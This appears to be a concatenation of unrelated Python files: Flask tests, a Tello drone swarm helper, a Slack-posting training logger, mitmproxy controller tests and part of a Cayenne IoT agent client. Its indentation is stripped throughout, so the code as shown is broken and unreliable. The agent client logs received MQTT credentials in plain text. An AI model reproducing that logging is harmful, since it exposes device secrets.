def test_exception_propagation():
def apprunner(config_key):
app = flask.Flask(__name__)
app.config['LOGGER_HANDLER_POLICY'] = 'never'
@app.route('/')
def index():
1 // 0
c = app.test_client()
if config_key is not None:
app.config[config_key] = True
try:
c.get('/')
except Exception:
pass
else:
assert False, 'expected exception'
else:
assert c.get('/').status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in 'TESTING', 'PROPAGATE_EXCEPTIONS', 'DEBUG', None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
def test_max_content_length():
app = flask.Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 64
@app.before_request
def always_first():
flask.request.form['myfile']
assert False
@app.route('/accept', methods=['POST'])
def accept_file():
flask.request.form['myfile']
assert False
@app.errorhandler(413)
def catcher(error):
return '42'
c = app.test_client()
rv = c.post('/accept', data={'myfile': 'foo' * 100})
assert rv.data == b'42'
def test_url_processors():
app = flask.Flask(__name__)
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and \
app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values.setdefault('lang_code', flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code', None)
@app.route('/<lang_code>/')
def index():
return flask.url_for('about')
@app.route('/<lang_code>/about')
def about():
return flask.url_for('something_else')
@app.route('/foo')
def something_else():
return flask.url_for('about', lang_code='en')
c = app.test_client()
assert c.get('/de/').data == b'/de/about'
assert c.get('/de/about').data == b'/foo'
assert c.get('/foo').data == b'/en/about'
def test_inject_blueprint_url_defaults():
app = flask.Flask(__name__)
bp = flask.Blueprint('foo.bar.baz', __name__,
template_folder='template')
@bp.url_defaults
def bp_defaults(endpoint, values):
values['page'] = 'login'
@bp.route('/<page>')
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults('foo.bar.baz.view', values)
expected = dict(page='login')
assert values == expected
with app.test_request_context('/somepage'):
url = flask.url_for('foo.bar.baz.view')
expected = '/login'
assert url == expected
def test_nonascii_pathinfo():
app = flask.Flask(__name__)
app.testing = True
@app.route(u'/киртест')
def index():
return 'Hello World!'
c = app.test_client()
rv = c.get(u'/киртест')
assert rv.data == b'Hello World!'
def test_debug_mode_complains_after_first_request():
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
return 'Awesome'
assert not app.got_first_request
assert app.test_client().get('/').data == b'Awesome'
try:
@app.route('/foo')
def broken():
return 'Meh'
except AssertionError as e:
assert 'A setup function was called' in str(e)
else:
assert False, 'Expected exception'
app.debug = False
@app.route('/foo')
def working():
return 'Meh'
assert app.test_client().get('/foo').data == b'Meh'
assert app.got_first_request
def test_before_first_request_functions():
got = []
app = flask.Flask(__name__)
@app.before_first_request
def foo():
got.append(42)
c = app.test_client()
c.get('/')
assert got == [42]
c.get('/')
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent():
got = []
app = flask.Flask(__name__)
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
c = app.test_client()
def get_and_assert():
c.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging():
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/', methods=['GET', 'POST'])
def foo():
return 'success'
with app.test_client() as c:
try:
c.post('/foo', data={})
except AssertionError as e:
assert 'http://localhost/foo/' in str(e)
assert ('Make sure to directly send '
'your POST-request to this URL') in str(e)
else:
assert False, 'Expected exception'
rv = c.get('/foo', data={}, follow_redirects=True)
assert rv.data == b'success'
app.debug = False
with app.test_client() as c:
rv = c.post('/foo', data={}, follow_redirects=True)
assert rv.data == b'success'
def test_route_decorator_custom_endpoint():
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/')
def foo():
return flask.request.endpoint
@app.route('/bar/', endpoint='bar')
def for_bar():
return flask.request.endpoint
@app.route('/bar/123', endpoint='123')
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for('foo') == '/foo/'
assert flask.url_for('bar') == '/bar/'
assert flask.url_for('123') == '/bar/123'
c = app.test_client()
assert c.get('/foo/').data == b'foo'
assert c.get('/bar/').data == b'bar'
assert c.get('/bar/123').data == b'123'
def test_preserve_only_once():
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail')
def fail_func():
1 // 0
c = app.test_client()
for x in range(3):
with pytest.raises(ZeroDivisionError):
c.get('/fail')
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception():
app = flask.Flask(__name__)
app.debug = True
errors = []
@app.route('/fail')
def fail_func():
1 // 0
@app.route('/success')
def success_func():
return 'Okay'
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
c = app.test_client()
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
c.get('/fail')
assert errors == []
# But this request triggers it, and it's an error
c.get('/success')
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
c.get('/success')
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g():
app = flask.Flask(__name__)
app.testing = True
with app.app_context():
assert flask.g.get('x') is None
assert flask.g.get('x', 11) == 11
flask.g.x = 42
assert flask.g.get('x') == 42
assert flask.g.x == 42
def test_g_iteration_protocol():
app = flask.Flask(__name__)
app.testing = True
with app.app_context():
flask.g.foo = 23
flask.g.bar = 42
assert 'foo' in flask.g
assert 'foos' not in flask.g
assert sorted(flask.g) == ['bar', 'foo']
def test_subdomain_basic_support():
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/')
def normal_index():
return 'normal index'
@app.route('/', subdomain='test')
def test_index():
return 'test index'
c = app.test_client()
rv = c.get('/', 'http://localhost/')
assert rv.data == b'normal index'
rv = c.get('/', 'http://test.localhost/')
assert rv.data == b'test index'
def test_subdomain_matching():
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost/')
assert rv.data == b'index for mitsuhiko'
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost:3000'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost:3000/')
assert rv.data == b'index for mitsuhiko'
def test_multi_route_rules():
app = flask.Flask(__name__)
@app.route('/')
@app.route('/<test>/')
def index(test='a'):
return test
rv = app.test_client().open('/')
assert rv.data == b'a'
rv = app.test_client().open('/b/')
assert rv.data == b'b'
def test_multi_route_class_views():
class View(object):
def __init__(self, app):
app.add_url_rule('/', 'index', self.index)
app.add_url_rule('/<test>/', 'index', self.index)
def index(self, test='a'):
return test
app = flask.Flask(__name__)
_ = View(app)
rv = app.test_client().open('/')
assert rv.data == b'a'
rv = app.test_client().open('/b/')
assert rv.data == b'b'
def test_run_defaults(monkeypatch):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv['result'] = 'running...'
app = flask.Flask(__name__)
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
app.run()
assert rv['result'] == 'running...'
def test_run_server_port(monkeypatch):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv['result'] = 'running on %s:%s ...' % (hostname, port)
app = flask.Flask(__name__)
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
hostname, port = 'localhost', 8000
app.run(hostname, port, debug=True)
assert rv['result'] == 'running on %s:%s ...' % (hostname, port)
|
swarm.py
|
from .tello import Tello
from threading import Thread, Barrier
from queue import Queue
class TelloSwarm:
@staticmethod
def fromFile(path, enable_exceptions=True):
with open(path, "r") as fd:
ips = fd.readlines()
return TelloSwarm.fromIps(ips, enable_exceptions)
@staticmethod
def fromIps(ips, enable_exceptions=True):
if len(ips) == 0:
raise Exception("No ips provided")
tellos = []
for ip in ips:
tellos.append(Tello(
host=ip.strip(),
enable_exceptions=enable_exceptions
))
return TelloSwarm(tellos)
def __init__(self, tellos):
self.tellos = tellos
self.barrier = Barrier(len(tellos))
self.funcBarrier = Barrier(len(tellos) + 1)
self.funcQueues = [Queue() for tello in tellos]
def worker(i):
queue = self.funcQueues[i]
tello = self.tellos[i]
while True:
func = queue.get()
self.funcBarrier.wait()
func(i, tello)
self.funcBarrier.wait()
self.threads = []
for i, tello in enumerate(tellos):
thread = Thread(target=worker, daemon=True, args=(i,))
thread.start()
self.threads.append(thread)
def sequential(self, func):
for i, tello in enumerate(self.tellos):
func(i, tello)
def parallel(self, func):
for queue in self.funcQueues:
queue.put(func)
self.funcBarrier.wait()
self.funcBarrier.wait()
def sync(self, timeout=None):
return self.barrier.wait(timeout)
def __getattr__(self, attr):
def callAll(*args, **kwargs):
self.parallel(lambda i, tello: getattr(tello, attr)(*args, **kwargs))
return callAll
def __iter__(self):
return iter(self.tellos)
def __len__(self):
return len(self.tellos)
|
infolog.py
|
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
_file.flush()
def log(msg, end='\n', slack=False):
print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
_file.flush()
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
|
test_controller.py
|
from threading import Thread, Event
from unittest.mock import Mock
from mitmproxy import controller
import queue
from mitmproxy.exceptions import Kill, ControlException
from mitmproxy import proxy
from mitmproxy import master
from mitmproxy.test import tutils
class TMsg:
pass
class TestMaster:
def test_simple(self):
class DummyMaster(master.Master):
@controller.handler
def log(self, _):
m.should_exit.set()
def tick(self, timeout):
# Speed up test
super().tick(0)
m = DummyMaster(None, proxy.DummyServer(None))
assert not m.should_exit.is_set()
msg = TMsg()
msg.reply = controller.DummyReply()
m.event_queue.put(("log", msg))
m.run()
assert m.should_exit.is_set()
def test_server_simple(self):
m = master.Master(None, proxy.DummyServer(None))
m.start()
m.shutdown()
m.start()
m.shutdown()
class TestServerThread:
def test_simple(self):
m = Mock()
t = master.ServerThread(m)
t.run()
assert m.serve_forever.called
class TestChannel:
def test_tell(self):
q = queue.Queue()
channel = controller.Channel(q, Event())
m = Mock(name="test_tell")
channel.tell("test", m)
assert q.get() == ("test", m)
assert m.reply
def test_ask_simple(self):
q = queue.Queue()
def reply():
m, obj = q.get()
assert m == "test"
obj.reply.handle()
obj.reply.send(42)
obj.reply.take()
obj.reply.commit()
Thread(target=reply).start()
channel = controller.Channel(q, Event())
assert channel.ask("test", Mock(name="test_ask_simple")) == 42
def test_ask_shutdown(self):
q = queue.Queue()
done = Event()
done.set()
channel = controller.Channel(q, done)
with tutils.raises(Kill):
channel.ask("test", Mock(name="test_ask_shutdown"))
class TestReply:
def test_simple(self):
reply = controller.Reply(42)
assert reply.state == "unhandled"
reply.handle()
assert reply.state == "handled"
reply.send("foo")
assert reply.value == "foo"
reply.take()
assert reply.state == "taken"
with tutils.raises(queue.Empty):
reply.q.get_nowait()
reply.commit()
assert reply.state == "committed"
assert reply.q.get() == "foo"
def test_kill(self):
reply = controller.Reply(43)
reply.handle()
reply.kill()
reply.take()
reply.commit()
assert reply.q.get() == Kill
def test_ack(self):
reply = controller.Reply(44)
reply.handle()
reply.ack()
reply.take()
reply.commit()
assert reply.q.get() == 44
def test_reply_none(self):
reply = controller.Reply(45)
reply.handle()
reply.send(None)
reply.take()
reply.commit()
assert reply.q.get() is None
def test_commit_no_reply(self):
reply = controller.Reply(46)
reply.handle()
reply.take()
with tutils.raises(ControlException):
reply.commit()
reply.ack()
reply.commit()
def test_double_send(self):
reply = controller.Reply(47)
reply.handle()
reply.send(1)
with tutils.raises(ControlException):
reply.send(2)
reply.take()
reply.commit()
def test_state_transitions(self):
states = {"unhandled", "handled", "taken", "committed"}
accept = {
"handle": {"unhandled"},
"take": {"handled"},
"commit": {"taken"},
"ack": {"handled", "taken"},
}
for fn, ok in accept.items():
for state in states:
r = controller.Reply(48)
r._state = state
if fn == "commit":
r.value = 49
if state in ok:
getattr(r, fn)()
else:
with tutils.raises(ControlException):
getattr(r, fn)()
r._state = "committed" # hide warnings on deletion
def test_del(self):
reply = controller.Reply(47)
with tutils.raises(ControlException):
reply.__del__()
reply.handle()
reply.ack()
reply.take()
reply.commit()
class TestDummyReply:
def test_simple(self):
reply = controller.DummyReply()
for _ in range(2):
reply.handle()
reply.ack()
reply.take()
reply.commit()
reply.mark_reset()
reply.reset()
assert reply.state == "unhandled"
def test_reset(self):
reply = controller.DummyReply()
reply.handle()
reply.ack()
reply.take()
reply.commit()
reply.mark_reset()
assert reply.state == "committed"
reply.reset()
assert reply.state == "unhandled"
def test_del(self):
reply = controller.DummyReply()
reply.__del__()
|
client.py
|
"""
This module contains the main agent client for connecting to the Cayenne server. The client connects
to server, retrives system info as well as sensor and actuator info and sends that data to the server.
It also responds messages from the server, to set actuator values, change system config settings, etc.
"""
from json import dumps, loads
from threading import Thread, Event
from time import strftime, localtime, tzset, time, sleep
from queue import Queue, Empty
from myDevices import __version__
from myDevices.utils.config import Config, APP_SETTINGS, NETWORK_SETTINGS
from myDevices.utils.logger import exception, info, warn, error, debug, logJson
from myDevices.sensors import sensors
from myDevices.system.hardware import Hardware
from myDevices.cloud.scheduler import SchedulerEngine
from myDevices.cloud.updater import Updater
from myDevices.system.systemconfig import SystemConfig
from myDevices.utils.daemon import Daemon
from myDevices.utils.threadpool import ThreadPool
# from myDevices.utils.history import History
from myDevices.utils.subprocess import executeCommand
# from hashlib import sha256
from myDevices.cloud.apiclient import CayenneApiClient
import myDevices.cloud.cayennemqtt as cayennemqtt
GENERAL_SLEEP_THREAD = 0.20
def GetTime():
"""Return string with the current time"""
tzset()
cur = time()
val = strftime("%Y-%m-%dT%T", localtime(cur))
timezone = strftime("%z", localtime(cur))
hourtime = int(timezone[1:3])
timezone = timezone[:1] + str(int(timezone[1:3]))+':'+ timezone[3:7]
if hourtime == 0:
timezone = ''
return val + timezone
class OSInfo():
"""Class for getting information about the OS"""
def __init__(self):
"""Initialize variables with OS information"""
try:
with open('/etc/os-release', 'r') as os_file:
for line in os_file:
splitLine = line.split('=')
if len(splitLine) < 2:
continue
key = splitLine[0].strip()
value = splitLine[1].strip().replace('"', '')
keys = ('VERSION_ID', 'ID')
if key in keys:
setattr(self, key, value)
except:
exception("OSInfo Unexpected error")
class ProcessorThread(Thread):
"""Class for processing messages from the server on a thread"""
def __init__(self, name, client):
"""Initialize processor thread"""
debug('ProcessorThread init')
Thread.__init__(self, name=name)
self.cloudClient = client
self.Continue = True
def run(self):
"""Process messages from the server until the thread is stopped"""
debug('ProcessorThread run, continue: ' + str(self.Continue))
while self.Continue:
try:
if self.cloudClient.exiting.wait(GENERAL_SLEEP_THREAD):
return
self.cloudClient.ProcessMessage()
except:
exception("ProcessorThread Unexpected error")
return
def stop(self):
"""Stop processing messages from the server"""
debug('ProcessorThread stop')
self.Continue = False
class WriterThread(Thread):
"""Class for sending messages to the server on a thread"""
def __init__(self, name, client):
"""Initialize writer thread"""
debug('WriterThread init')
Thread.__init__(self, name=name)
self.cloudClient = client
self.Continue = True
def run(self):
"""Send messages to the server until the thread is stopped"""
debug('WriterThread run')
while self.Continue:
try:
if self.cloudClient.exiting.wait(GENERAL_SLEEP_THREAD):
return
if self.cloudClient.mqttClient.connected == False:
info('WriterThread mqttClient not connected')
continue
got_packet = False
topic, message = self.cloudClient.DequeuePacket()
info("topic={}, message={}".format(topic, message))
# startswith(cayennemqtt.DEV_SENSOR)
if topic or message:
got_packet = True
try:
if message or topic == cayennemqtt.JOBS_TOPIC:
if topic == cayennemqtt.DATA_TOPIC:
for sensor in message:
if sensor['channel'].startswith(cayennemqtt.DEV_SENSOR):
# "state_topic": "{}/sensor/{}/dev:{}/state".format(self.mqtt_dis_prefix, self.serial, name ),
state_topic = "sensor/{}/{}/state".format( self.cloudClient.hardware.Serial, sensor['channel'] )
sensor_message = {"domain":'sensor',"device_class":sensor['type'],"location":"",'value':sensor['value']}
sensor_message = dumps(sensor_message)
info("state_topic={} ,sensor_message={}".format(state_topic,sensor_message))
self.cloudClient.mqttClient.publish_packet(state_topic, sensor_message)
continue
elif sensor['channel'].startswith(cayennemqtt.SYS_GPIO):
info("sys.gpio={} ".format(sensor))
elif sensor['channel'].startswith("sys"):
info("sys={} ".format(sensor))
if not isinstance(message, str):
message = dumps(message)
self.cloudClient.mqttClient.publish_packet(topic, message)
message = None
except:
exception("WriterThread publish packet error")
finally:
if got_packet:
self.cloudClient.writeQueue.task_done()
except:
exception("WriterThread unexpected error")
return
def stop(self):
"""Stop sending messages to the server"""
debug('WriterThread stop')
self.Continue = False
class TimerThread(Thread):
"""Class to run a function on a thread at timed intervals"""
def __init__(self, function, interval, initial_delay=0):
"""Set function to run at intervals and start thread"""
Thread.__init__(self)
self.setDaemon(True)
self.function = function
self.interval = interval
self.initial_delay = initial_delay
self.start()
def run(self):
"""Run function at intervals"""
sleep(self.initial_delay)
while True:
try:
self.function()
sleep(self.interval)
except:
exception("TimerThread Unexpected error")
class CloudServerClient:
"""Class to connect to the server and send and receive data"""
def __init__(self, host, port, cayenneApiHost):
"""Initialize the client configuration"""
self.HOST = host
self.PORT = port
self.CayenneApiHost = cayenneApiHost
self.config = Config(APP_SETTINGS)
self.networkConfig = Config(NETWORK_SETTINGS)
self.username = self.config.get('Agent', 'Username', None)
self.password = self.config.get('Agent', 'Password', None)
self.clientId = self.config.get('Agent', 'ClientID', None)
self.location = self.config.get('Agent', 'Location', "house0@room0@")
self.mqtt_dis_prefix = self.config.get('Agent', 'MQTT_DIS_PREFIX', "homeassistant")
self.connected = False
self.exiting = Event()
self.sensorsClient = None
def __del__(self):
"""Delete the client"""
self.Destroy()
def Start(self):
"""Connect to server and start background threads"""
try:
self.installDate=None
try:
self.installDate = self.config.get('Agent', 'InstallDate', fallback=None)
except:
pass
if not self.installDate:
self.installDate = int(time())
self.config.set('Agent', 'InstallDate', self.installDate)
if not self.username and not self.password and not self.clientId:
self.CheckSubscription()
if not self.Connect():
error('Error starting agent')
return
self.schedulerEngine = SchedulerEngine(self, 'client_scheduler')
self.readQueue = Queue()
self.writeQueue = Queue()
self.hardware = Hardware()
self.oSInfo = OSInfo()
self.count = 10000
self.buff = bytearray(self.count)
self.writerThread = WriterThread('writer', self)
self.writerThread.start()
self.processorThread = ProcessorThread('processor', self)
self.processorThread.start()
self.systemInfo = []
TimerThread(self.SendSystemInfo, 300)
self.sensorsClient = sensors.SensorsClient(self)
self.sensorsClient.SetDataChanged(self.OnDataChanged)
# TimerThread(self.SendSystemState, 30, 5)
self.updater = Updater(self.config)
self.updater.start()
events = self.schedulerEngine.get_scheduled_events()
self.EnqueuePacket(events, cayennemqtt.JOBS_TOPIC)
# self.sentHistoryData = {}
# self.historySendFails = 0
# self.historyThread = Thread(target=self.SendHistoryData)
# self.historyThread.setDaemon(True)
# self.historyThread.start()
except Exception as e:
exception('Initialize error: ' + str(e))
def Destroy(self):
"""Destroy client and stop client threads"""
info('Shutting down client')
self.exiting.set()
if hasattr(self, 'sensorsClient'):
self.sensorsClient.StopMonitoring()
if hasattr(self, 'schedulerEngine'):
self.schedulerEngine.stop()
if hasattr(self, 'updater'):
self.updater.stop()
if hasattr(self, 'writerThread'):
self.writerThread.stop()
if hasattr(self, 'processorThread'):
self.processorThread.stop()
ThreadPool.Shutdown()
self.Disconnect()
info('Client shut down')
def OnDataChanged(self, data):
"""Enqueue a packet containing changed system data to send to the server"""
try:
if len(data) > 15:
items = [{item['channel']:item['value']} for item in data if not item['channel'].startswith(cayennemqtt.SYS_GPIO)]
info('Send changed data: {} + {}'.format(items, cayennemqtt.SYS_GPIO))
else:
info('Send changed data: {}'.format([{item['channel']:item['value']} for item in data]))
# items = {}
# gpio_items = {}
# for item in data:
# if not item['channel'].startswith(cayennemqtt.SYS_GPIO):
# items[item['channel']] = item['value']
# else:
# channel = item['channel'].replace(cayennemqtt.SYS_GPIO + ':', '').split(';')
# if not channel[0] in gpio_items:
# gpio_items[channel[0]] = str(item['value'])
# else:
# gpio_items[channel[0]] += ',' + str(item['value'])
# info('Send changed data: {}, {}: {}'.format(items, cayennemqtt.SYS_GPIO, gpio_items))
except:
info('Send changed data')
pass
self.EnqueuePacket(data)
def SendSystemInfo(self):
"""Enqueue a packet containing system info to send to the server"""
try:
currentSystemInfo = []
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.SYS_OS_NAME, value=self.oSInfo.ID)
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.SYS_OS_VERSION, value=self.oSInfo.VERSION_ID)
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.AGENT_VERSION, value=self.config.get('Agent', 'Version', __version__))
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.SYS_POWER_RESET, value=0)
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.SYS_POWER_HALT, value=0)
config = SystemConfig.getConfig()
if config:
channel_map = {'I2C': cayennemqtt.SYS_I2C, 'SPI': cayennemqtt.SYS_SPI, 'Serial': cayennemqtt.SYS_UART,
'OneWire': cayennemqtt.SYS_ONEWIRE, 'DeviceTree': cayennemqtt.SYS_DEVICETREE}
for key, channel in channel_map.items():
try:
cayennemqtt.DataChannel.add(currentSystemInfo, channel, value=config[key])
except:
pass
if currentSystemInfo != self.systemInfo:
data = currentSystemInfo
if self.systemInfo:
data = [x for x in data if x not in self.systemInfo]
if data:
self.systemInfo = currentSystemInfo
info('Send system info: {}'.format([{item['channel']:item['value']} for item in data]))
self.EnqueuePacket(data)
except Exception:
exception('SendSystemInfo unexpected error')
def CheckSubscription(self):
"""Check that an invite code is valid"""
inviteCode = self.config.get('Agent', 'InviteCode', fallback=None)
if not inviteCode:
error('No invite code found in {}'.format(self.config.path))
print('Please input an invite code. This can be retrieved from the Cayenne dashboard by adding a new Raspberry Pi device.\n'
'The invite code will be part of the script name shown there: rpi_[invitecode].sh.')
inviteCode = input('Invite code: ')
if inviteCode:
self.config.set('Agent', 'InviteCode', inviteCode)
else:
print('No invite code set, exiting.')
raise SystemExit
inviteCode = self.config.get('Agent', 'InviteCode')
cayenneApiClient = CayenneApiClient(self.CayenneApiHost)
credentials = cayenneApiClient.loginDevice(inviteCode)
if credentials == None:
error('Registration failed for invite code {}, closing the process'.format(inviteCode))
raise SystemExit
else:
info('Registration succeeded for invite code {}, credentials = {}'.format(inviteCode, credentials))
self.config.set('Agent', 'Initialized', 'true')
try:
self.username = credentials['mqtt']['username']
self.password = credentials['mqtt']['password']
self.clientId = credentials['mqtt']['clientId']
self.config.set('Agent', 'Username', self.username)
self.config.set('Agent', 'Password', self.password)
self.config.set('Agent', 'ClientID', self.clientId)
except:
exception('Invalid credentials, closing the process')
raise SystemExit
def Connect(self):
"""Connect to the server"""
self.connected = False
count = 0
while self.connected == False and count < 30 and not self.exiting.is_set():
try:
self.mqttClient = cayennemqtt.CayenneMQTTClient()
self.mqttClient.on_message = self.OnMessage
self.mqttClient.begin(self.username, self.password, self.clientId, self.HOST, self.PORT)
self.mqttClient.loop_start()
self.connected = True
except OSError as oserror:
Daemon.OnFailure('cloud', oserror.errno)
error('Connect failed: ' + str(self.HOST) + ':' + str(self.PORT) + ' Error:' + str(oserror))
if self.exiting.wait(30):
# If we are exiting return immediately
return self.connected
count += 1
return self.connected
def Disconnect(self):
"""Disconnect from the server"""
Daemon.Reset('cloud')
try:
if hasattr(self, 'mqttClient'):
self.mqttClient.loop_stop()
info('myDevices cloud disconnected')
except:
exception('Error stopping client')
def Restart(self):
"""Restart the server connection"""
if not self.exiting.is_set():
debug('Restarting cycle...')
sleep(1)
self.Disconnect()
self.Connect()
def CheckJson(self, message):
"""Check if a JSON message is valid"""
try:
test = loads(message)
except ValueError:
return False
return True
def OnMessage(self, message):
"""Add message from the server to the queue"""
info('OnMessage: {}'.format(message))
self.readQueue.put(message)
def RunAction(self, action):
"""Run a specified action"""
debug('RunAction: {}'.format(action))
result = True
command = action.copy()
self.mqttClient.transform_command(command)
result = self.ExecuteMessage(command)
return result
def ProcessMessage(self):
"""Process a message from the server"""
try:
messageObject = self.readQueue.get(False)
if not messageObject:
return False
except Empty:
return False
self.ExecuteMessage(messageObject)
def ExecuteMessage(self, message):
"""Execute an action described in a message object
Returns: True if action was executed, False otherwise."""
result = False
if not message:
return result
channel = message['channel']
info('ExecuteMessage: {}'.format(message))
if channel in (cayennemqtt.SYS_POWER_RESET, cayennemqtt.SYS_POWER_HALT):
result = self.ProcessPowerCommand(message)
elif channel.startswith(cayennemqtt.DEV_SENSOR):
result = self.ProcessSensorCommand(message)
elif channel.startswith(cayennemqtt.SYS_GPIO):
result = self.ProcessGpioCommand(message)
elif channel == cayennemqtt.AGENT_DEVICES:
result = self.ProcessDeviceCommand(message)
elif channel in (cayennemqtt.SYS_I2C, cayennemqtt.SYS_SPI, cayennemqtt.SYS_UART, cayennemqtt.SYS_ONEWIRE):
result = self.ProcessConfigCommand(message)
elif channel == cayennemqtt.AGENT_MANAGE:
result = self.ProcessAgentCommand(message)
elif channel == cayennemqtt.AGENT_SCHEDULER:
result = self.ProcessSchedulerCommand(message)
else:
info('Unknown message')
return result
def ProcessPowerCommand(self, message):
"""Process command to reboot/shutdown the system
Returns: True if command was processed, False otherwise."""
error_message = None
try:
self.EnqueueCommandResponse(message, error_message)
commands = {cayennemqtt.SYS_POWER_RESET: 'sudo shutdown -r now', cayennemqtt.SYS_POWER_HALT: 'sudo shutdown -h now'}
if int(message['payload']) == 1:
debug('Processing power command')
data = []
cayennemqtt.DataChannel.add(data, message['channel'], value=1)
self.EnqueuePacket(data)
self.writeQueue.join()
info('Calling execute: {}'.format(commands[message['channel']]))
output, result = executeCommand(commands[message['channel']])
debug('ProcessPowerCommand: {}, result: {}, output: {}'.format(message, result, output))
if result != 0:
error_message = 'Error executing shutdown command'
except Exception as ex:
error_message = '{}: {}'.format(type(ex).__name__, ex)
if error_message:
error(error_message)
data = []
cayennemqtt.DataChannel.add(data, message['channel'], value=0)
self.EnqueuePacket(data)
raise ExecuteMessageError(error_message)
return error_message == None
def ProcessAgentCommand(self, message):
"""Process command to manage the agent state
Returns: True if command was processed, False otherwise."""
error = None
try:
if message['suffix'] == 'uninstall':
output, result = executeCommand('sudo -n /etc/myDevices/uninstall/uninstall.sh', disablePipe=True)
debug('ProcessAgentCommand: {}, result: {}, output: {}'.format(message, result, output))
if result != 0:
error = 'Error uninstalling agent'
# elif message['suffix'] == 'config':
# for key, value in message['payload'].items():
# if value is None:
# info('Remove config item: {}'.format(key))
# self.config.remove('Agent', key)
# else:
# info('Set config item: {} {}'.format(key, value))
# self.config.set('Agent', key, value)
else:
error = 'Unknown agent command: {}'.format(message['suffix'])
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
if error:
raise ExecuteMessageError(error)
return error == None
def ProcessConfigCommand(self, message):
"""Process system configuration command
Returns: True if command was processed, False otherwise."""
error = None
try:
value = 1 - int(message['payload']) #Invert the value since the config script uses 0 for enable and 1 for disable
command_id = {cayennemqtt.SYS_I2C: 11, cayennemqtt.SYS_SPI: 12, cayennemqtt.SYS_UART: 13, cayennemqtt.SYS_ONEWIRE: 19}
result, output = SystemConfig.ExecuteConfigCommand(command_id[message['channel']], value)
debug('ProcessConfigCommand: {}, result: {}, output: {}'.format(message, result, output))
if result != 0:
error = 'Error executing config command'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error == None
def ProcessGpioCommand(self, message):
"""Process GPIO command
Returns: True if command was processed, False otherwise."""
error = None
try:
channel = int(message['channel'].replace(cayennemqtt.SYS_GPIO + ':', ''))
result = self.sensorsClient.GpioCommand(message.get('suffix', 'value'), channel, message['payload'])
debug('ProcessGpioCommand result: {}'.format(result))
if result == 'failure':
error = 'GPIO command failed'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error == None
def ProcessSensorCommand(self, message):
"""Process sensor command
Returns: True if command was processed, False otherwise."""
error = None
try:
sensor_info = message['channel'].replace(cayennemqtt.DEV_SENSOR + ':', '').split(':')
sensor = sensor_info[0]
channel = None
if len(sensor_info) > 1:
channel = sensor_info[1]
result = self.sensorsClient.SensorCommand(message.get('suffix', 'value'), sensor, channel, message['payload'])
debug('ProcessSensorCommand result: {}'.format(result))
if result is False:
error = 'Sensor command failed'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error == None
def ProcessDeviceCommand(self, message):
"""Process a device command to add/edit/remove a sensor
